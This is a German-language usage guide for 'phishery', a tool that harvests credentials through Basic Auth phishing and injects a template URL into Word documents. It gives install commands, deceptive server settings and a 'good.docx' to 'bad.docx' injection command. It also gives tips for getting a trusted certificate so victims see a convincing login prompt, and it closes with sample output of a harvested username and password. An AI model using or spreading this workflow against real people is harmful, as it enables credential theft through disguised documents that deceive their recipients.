
Ein SSL-aktivierter Basic-Auth-Credential-Harvester mit einem Word-Dokumentvorlagen-URL-Injektor.
Phishery ist ein einfacher SSL-fähiger HTTP-Server, dessen Hauptzweck das Phishing von Anmeldedaten über Basic Authentication ist. Phishery bietet auch die Möglichkeit, die URL einfach in ein .docx-Word-Dokument einzufügen.

Die Stärke von phishery zeigt sich am besten, wenn die Vorlage eines Word-Dokuments auf eine phishery-URL gesetzt wird. Dadurch sendet Microsoft Word eine Anfrage an die URL, was dazu führt, dass dem Endbenutzer ein Authentifizierungsdialog angezeigt wird. Die Möglichkeit, eine URL in jede .docx-Datei einzufügen, besteht mit den Optionen -i [eingabe-docx], -o [ausgabe-docx] und -u [url] von phishery.
Betriebssystemspezifische Pakete können von hier heruntergeladen werden.
Entpacken Sie das Archiv und installieren Sie optional die Binärdatei in den $PATH.
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin
$ phishery --help
|\ \\\\__ O __ _ __
| \_/ o \ o ____ / /_ (_)____/ /_ ___ _______ __
> _ (( <_ oO / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /
|/ |/ / .___/_/ /_/_/____/_/ /_/\___/_/ \__, /
/_/ Basic Auth Credential Harvester (____/
with Word Doc Template Injector
Start the server : phishery -s settings.json -c credentials.json
Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
Options:
-h, --help Show usage and exit.
-v Show version and exit.
-s The JSON settings file used to setup the server. [default: "settings.json"]
-c The JSON file to store harvested credentials. [default: "credentials.json"]
-u The phishery URL to use as the Word document template.
-i The Word .docx file to inject with a template URL.
-o The new Word .docx file with the injected template URL.
Ändern Sie die bereitgestellte settings.json-Datei nach Bedarf. Standardmäßig sollte sie so aussehen:
{
"ip": "0.0.0.0",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 200,
"responseFile": "template.dotx",
"responseHeaders": [
["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
]
}
Diese Konfiguration startet den HTTP-Server auf Port 443 mit SSL, konfiguriert für server.crt und server.key. Der Basic-Authentication-Realm ist auf Secure Document Gateway gesetzt. Wenn Anmeldedaten bereitgestellt werden, wird ein 200-Antwortstatus zusammen mit dem Inhalt der enthaltenen template.dotx und dem Content-Type-Header Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template gesendet.
Die Einstellungsdatei kann auch so konfiguriert werden, dass ein einfacher Body ausgegeben wird, indem responseBody verwendet wird, wie folgt:
{
"ip": "0.0.0.0",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 404,
"responseBody": "<h1>Not Found</h1>",
"responseHeaders": [
["Content-Type", "text/html"]
]
}
Die Effektivität dieses Werkzeugs basiert hauptsächlich auf der verwendeten Domain und dem Basic-Auth-Realm, da dies oft das Einzige ist, was der Endbenutzer sieht, wenn es von einem Office-Dokument ausgelöst wird. Stellen Sie sicher, dass Ihre DNS-A-Einträge auf die öffentliche IP des phishery-Servers zeigen.
Es wird empfohlen, das mitgelieferte Zertifikat durch ein vertrauenswürdiges zu ersetzen, z. B. eines, das mit LetsEncrypt erstellt wurde. Microsoft Word unter OS X verhindert den Auth-Dialog, wenn das Zertifikat ungültig ist, und Microsoft Word unter Windows fordert den Benutzer auf, das ungültige Zertifikat zu akzeptieren.
Sobald der Server konfiguriert ist und läuft, müssen Sie nur noch eine phishery-URL in ein Dokument oder an eine andere Stelle Ihrer Wahl einbetten. Phishery bietet Ihnen die Möglichkeit, Ihre URL als Vorlage in ein Word-Dokument einzufügen. Anleitungen dazu finden Sie unten.
Um ein Word-Dokument mit einer Vorlagen-URL zu versehen, benötigen Sie eine .docx-Datei und die phishery-Server-URL.
Führen Sie nun phishery mit Ihrem Dokument und der URL aus:
$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
[+] Opening Word document: good.docx
[+] Setting Word document template to: https://secure.site.local/docs
[+] Saving injected Word document to: bad.docx
[*] Injected Word document has been saved!
Stellen Sie sicher, dass Ihr phishery-Server läuft und unter der von Ihnen verwendeten URL erreichbar ist. Wenn das Word-Dokument geöffnet wird, wird dem Opfer ein Authentifizierungsdialog angezeigt.
Wenn das Opfer das Dokument öffnet, sehen Sie Folgendes:
$ ./phishery
[+] Credential store initialized at: credentials.json
[+] Starting HTTPS Auth Server on: 0.0.0.0:443
[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs
[*] Sending Basic Auth response to: 127.0.0.1
[*] New credentials harvested!
[HTTP] Host : secure.example.local
[HTTP] Request : /docs
[HTTP] User Agent : Microsoft Office Word
[HTTP] IP Address : 127.0.0.1
[AUTH] Username : john.doe
[AUTH] Password : Summer15